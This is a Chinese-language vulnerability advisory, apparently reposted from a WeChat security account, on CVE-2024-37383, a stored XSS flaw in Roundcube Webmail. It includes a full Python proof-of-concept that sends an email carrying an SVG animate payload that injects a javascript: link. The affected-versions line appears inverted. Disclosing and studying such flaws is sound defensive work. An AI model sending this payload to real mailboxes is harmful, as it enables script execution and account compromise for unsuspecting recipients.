0x00 前言
Roundcube Webmail是一个开源的基于web的电子邮件客户端,旨在提供用户友好的界面和强大的功能,使用户能够通过web浏览器方便地访问和管理他们的电子邮件。
Roundcube支持标准的邮件协议(如IMAP和SMTP),并提供了许多常见的邮件功能,如收发邮件、管理联系人、创建日历事件等。其界面简洁直观,易于使用,同时还支持插件扩展,用户可以根据自己的需求定制功能。
Roundcube Webmail被广泛应用于个人用户、企业和组织,为他们提供了一个方便、安全的电子邮件管理解决方案。
0x01 漏洞描述
在Roundcube Webmail中发现了CVE-2024-37383漏洞。这是一个存储的XSS漏洞,允许攻击者在用户页面上执行JavaScript代码。
错误出现在处理电子邮件正文标记中的SVG元素的代码中。在显示电子邮件之前,Roundcube会处理某些标签的内容及其属性。
0x02 CVE编号
CVE-2024-37383
0x03 影响版本
Roundcube Webmail >1.5.7
Roundcube Webmail >1.6.7
0x04 漏洞详情
POC:
https://github.com/bartfroklage/CVE-2024-37383-POC
import smtplib import argparse from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2024-37383 Proof Of Concept") parser.add_argument("-e", "--sender_email", required=True, help="Sender's email address") parser.add_argument("-p", "--sender_password", required=True, help="Sender's email password") parser.add_argument("-t", "--recipient_email", required=True, help="Recipient's email address") parser.add_argument("-sh", "--smtp_host", default="smtp.gmail.com", help="SMTP host address") parser.add_argument("-sp", "--smtp_port", default=587, help="SMTP port number") args = parser.parse_args() msg = MIMEMultipart('alternative') msg["From"] = args.sender_email msg["To"] = args.recipient_email msg["Subject"] = "CVE-2024-37383 Proof Of Concept" text = "Please use HTML view to see this email." html = """\ <html> <head></head> <body> <svg> <animate attributeName="href " values="javascript:alert(\'You are powned.\')" href="#link" /> </animate> <a id="link"> <text x=20 y=20>Click me</text> </a> </svg> </body> </html> """ msg.attach(MIMEText(text, 'plain')) msg.attach(MIMEText(html, 'html')) try: server = smtplib.SMTP(args.smtp_host, args.smtp_port) server.set_debuglevel(True) server.starttls() server.login(args.sender_email, args.sender_password) server.sendmail(args.sender_email, args.recipient_email, msg.as_string()) server.quit() print("Email sent successfully.") except Exception as e: print("An error occurred:", str(e))
0x05 参考链接
https://github.com/roundcube/roundcubemail/commit/43aaaa528646877789ec028d87924ba1accf5242
https://github.com/roundcube/roundcubemail/releases/tag/1.5.7
原文始发于微信公众号(信安百科):CVE-2024-37383|Roundcube Webmail存储型XSS漏洞(POC)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论